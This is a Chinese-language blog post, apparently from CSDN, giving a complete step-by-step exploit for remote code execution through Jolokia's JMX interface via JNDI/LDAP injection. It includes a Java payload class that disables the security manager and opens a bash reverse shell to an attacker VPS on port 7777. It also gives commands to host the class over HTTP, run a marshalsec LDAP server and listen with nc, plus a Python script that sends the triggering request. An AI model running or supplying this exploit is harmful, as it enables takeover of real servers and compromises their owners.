Jolokia RCE漏洞利用

本文详细介绍了如何利用Java LDAP远程代码执行漏洞进行攻击,包括编写Exploit.java并编译,通过HTTP服务器分发,设置LDAP服务器,使用nc监听,以及通过JMX接口触发漏洞的完整步骤。同时提供了参考链接深入理解该漏洞。
摘要由CSDN通过智能技术生成

利用步骤

1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java

public class Exploit {
  public Exploit() {
    try {
      System.setSecurityManager(null);
      java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp/VPS地址/7777 0>&1`");
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

2、在Exploit.java目录下开启一个web服务

python3 -m http.server 80

3、运行LDAP服务器在1389端口
marshalsec-0.0.3-SNAPSHOT-all.jar下载地址

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS地址/#Exploit 1389

4、nc开启监听

nc -lvp 7777

5、执行exp

import requests
#url = 'http://x.x.x.x/jolokia/..;/jolokia/'
url = 'http://x.x.x.x/jolokia'
headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        "Content-Type": "application/x-www-form-urlencoded",
        }
data = '''{
    "type" : "read",
    "mbean" : "java.lang:type=Memory",
    "target" : {
         "url" : "service:jmx:rmi:///jndi/ldap://VPS地址:1389/Exploit"
    }
}'''
result = requests.post(url, headers=headers, data=data, timeout=5)

参考文章

https://xz.aliyun.com/t/2294
https://www.cnblogs.com/cwkiller/p/13397335.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值